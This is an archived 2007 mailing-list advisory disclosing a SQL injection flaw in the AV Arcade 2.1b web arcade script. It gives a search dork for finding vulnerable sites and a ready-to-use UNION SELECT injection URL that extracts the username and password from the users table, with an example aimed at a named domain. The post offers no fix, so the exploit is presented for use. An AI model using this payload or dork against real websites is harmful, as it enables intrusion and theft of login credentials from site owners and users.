Pantek Library

Hosting Provided By

CybrHost

High Speed Hosting

AV Arcade 2.1b (view_page.php) Remote SQL Injection

From: <teh_lost_byte(at)yahoo.com>
Date: Mon Jul 02 2007 - 09:20:05 EDT

AV Arcade 2.1b (view_page.php) Remote SQL Injection

Web: AV Arcade 2.1b
Site : www.avscripts.net
Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ] Romanian Security Team [Ethical Hacking] - http://RSTZONE.nET

Description: SQL injection in $id of includes/view_page.php

Exploit:
/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1
Example:
http://www.yourgame.org/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1

GREETZ: all memberz of RST and milw0rm
//kw3rln [ http://rstzone.net ]

[EOF] Received on Mon Jul 2 14:10:43 2007

This message: [ Message body ]
Next message: prodigy.zero(at)gmail.com: "Re: Light Blog 4.1 XSS Vulnerability"
Previous message: Steve Kemp: "[SECURITY] [DSA 1328-1] New unicon-imc2 packages fix buffer overflow"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Mon Jul 02 2007 - 14:20:02 EDT

Contact Us Legal Notices Order Services Online
Pantek Home Privacy Policy IT news Site Map Pantek Library